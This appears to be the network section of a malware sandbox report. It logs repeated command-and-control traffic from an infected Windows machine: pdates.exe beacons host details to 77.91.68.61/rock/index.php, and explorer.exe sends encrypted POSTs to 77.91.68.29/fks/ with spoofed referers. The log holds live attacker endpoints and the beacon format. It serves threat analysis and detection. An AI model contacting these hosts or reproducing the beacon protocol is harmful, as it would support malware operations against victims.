Jul 27, 2023 01:35:38.383286953 CEST	4248	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:38.431663036 CEST	4281	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.5	49776	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:19.116760015 CEST	2904	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:19.164931059 CEST	2904	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
590	192.168.2.5	50312	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:38.589947939 CEST	4364	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:38.638740063 CEST	4397	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
591	192.168.2.5	50313	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:38.812973976 CEST	4594	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:38.861004114 CEST	4594	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
592	192.168.2.5	50314	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:39.023962975 CEST	4791	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:39.073237896 CEST	4824	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
593	192.168.2.5	50315	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:39.257492065 CEST	5152	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:39.306767941 CEST	5218	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
594	192.168.2.5	50316	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:39.468558073 CEST	5448	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:39.517376900 CEST	5448	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
595	192.168.2.5	50317	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:39.676832914 CEST	5465	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:39.724936008 CEST	5465	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
596	192.168.2.5	50318	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:39.886812925 CEST	5466	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:39.935158014 CEST	5466	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
597	192.168.2.5	50319	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:40.099277020 CEST	5467	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:40.149987936 CEST	5467	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
598	192.168.2.5	50320	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:40.332328081 CEST	5599	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:40.382110119 CEST	5599	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
599	192.168.2.5	50321	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:40.536820889 CEST	5747	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:40.585664034 CEST	5747	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49722	77.91.68.29	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:01.286856890 CEST	983	OUT	POST /fks/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://chdgimlpjf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 302 Host: 77.91.68.29
Jul 27, 2023 01:33:01.286945105 CEST	983	OUT	Data Raw: 14 6d 14 7d 43 65 17 82 ff 74 d1 57 05 d3 11 27 47 f5 86 50 b8 14 19 46 ea 98 34 d4 f5 de bb e7 e5 a8 44 c8 bf ff 64 d4 77 01 7d b1 74 f5 59 fb 08 ff e2 b6 02 7a b6 b5 08 2d 62 7f 1f e1 68 05 94 04 50 e7 29 af a3 d5 f3 c9 39 df 28 fc d7 3e 95 35 Data Ascii: m}CetW'GPF4Ddw}tYz-bhP)9(>5RfMN4C$<"c9$xpX=`&=115^\aZ $6-Ssm}8MijgpRh,C}JP,(oo/WF;B )87Zh)[5,/H
Jul 27, 2023 01:33:01.338769913 CEST	984	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jul 2023 23:33:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 403 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 37 37 2e 39 31 2e 36 38 2e 32 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 77.91.68.29 Port 80</address></body></html>
Jul 27, 2023 01:33:01.490900993 CEST	984	OUT	POST /fks/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://crpqe.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 189 Host: 77.91.68.29
Jul 27, 2023 01:33:01.490952969 CEST	985	OUT	Data Raw: 14 6d 14 7d 43 65 17 82 ff 74 d1 57 05 d3 11 27 47 f5 86 50 b8 14 19 46 ea 98 34 d4 f5 de bb e7 e5 a8 44 c8 bf ff 64 d4 77 01 7d b1 74 f5 59 fb 08 ff e2 b6 02 7a b6 b5 08 2d 62 7f 1f e1 68 05 94 04 50 e7 28 af a0 d5 f3 c9 38 df 28 fc c6 31 f4 57 Data Ascii: m}CetW'GPF4Ddw}tYz-bhP(8(1WBqP#{z/6$$`Q!mA"Se =#R;-t\k!X;mXg~<80.\|at:Hn{
Jul 27, 2023 01:33:01.539705992 CEST	985	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jul 2023 23:33:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 43 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c7 0b fb 57 b6 e0 74 61 82 c9 45 a6 8d 3c 96 b8 30 17 fe 15 ed 03 30 c8 Data Ascii: H>99$JYWtaE<00

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.5	49777	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:19.407572985 CEST	2905	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:19.456782103 CEST	2905	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
600	192.168.2.5	50322	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:40.762923002 CEST	5748	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:40.812285900 CEST	5748	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
601	192.168.2.5	50323	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:40.973367929 CEST	5749	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:41.022013903 CEST	5749	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
602	192.168.2.5	50324	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:41.181687117 CEST	5749	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:41.230159044 CEST	5750	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
603	192.168.2.5	50325	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:41.379395962 CEST	5750	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:41.428633928 CEST	5751	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
604	192.168.2.5	50326	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:41.584500074 CEST	5751	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:41.633169889 CEST	5752	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
605	192.168.2.5	50327	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:41.787167072 CEST	5752	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:41.835562944 CEST	5753	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
606	192.168.2.5	50328	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
